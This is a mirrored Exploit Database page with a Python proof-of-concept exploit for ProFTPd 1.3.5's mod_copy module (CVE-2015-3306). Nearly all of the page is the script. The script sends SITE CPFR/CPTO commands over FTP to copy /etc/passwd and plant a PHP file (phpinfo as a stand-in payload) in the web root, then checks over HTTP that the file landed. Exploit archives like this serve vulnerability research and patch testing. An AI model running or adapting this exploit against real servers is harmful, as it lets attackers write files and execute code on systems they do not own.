ProFTPd 1.3.5 – ‘mod_copy’ Remote Command Execution (2)

• Exploit Database
• 33 阅读

• 作者： Shellbr3ak
  日期： 2021-05-26
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49908/

• # Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
  # Date: 25/05/2021
  # Exploit Author: Shellbr3ak
  # Version: 1.3.5 
  # Tested on: Ubuntu 16.04.6 LTS
  # CVE : CVE-2015-3306
  
  #!/usr/bin/env python3
  
  import sys
  import socket
  import requests
  
  def exploit(client, target):
  client.connect((target,21)) # Connecting to the target server
  banner = client.recv(74)
  print(banner.decode())
  client.send(b'site cpfr /etc/passwd\r\n')
  print(client.recv(1024).decode())
  client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.
  print(client.recv(1024).decode())
  client.send(b'site cpfr /proc/self/fd/3\r\n')
  print(client.recv(1024).decode())
  client.send(b'site cpto /var/www/html/test.php\r\n')
  print(client.recv(1024).decode())
  client.close()
  print('Exploit Completed')
  
  def check(url):
  req = requests.get(url) # Requesting the written PoC php file via HTTP
  if req.status_code == 200:
  print('[+] File Written Successfully')
  print(f'[+] Go to : {url}')
  else:
  print('[!] Something Went Wrong')
  print('[!] Directory might not be writable')
  
  def main():
  client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  target = sys.argv[1]
  exploit(client, target)
  url = 'http://' + target + '/test.php'
  check(url)
  
  if __name__ == '__main__':
  main()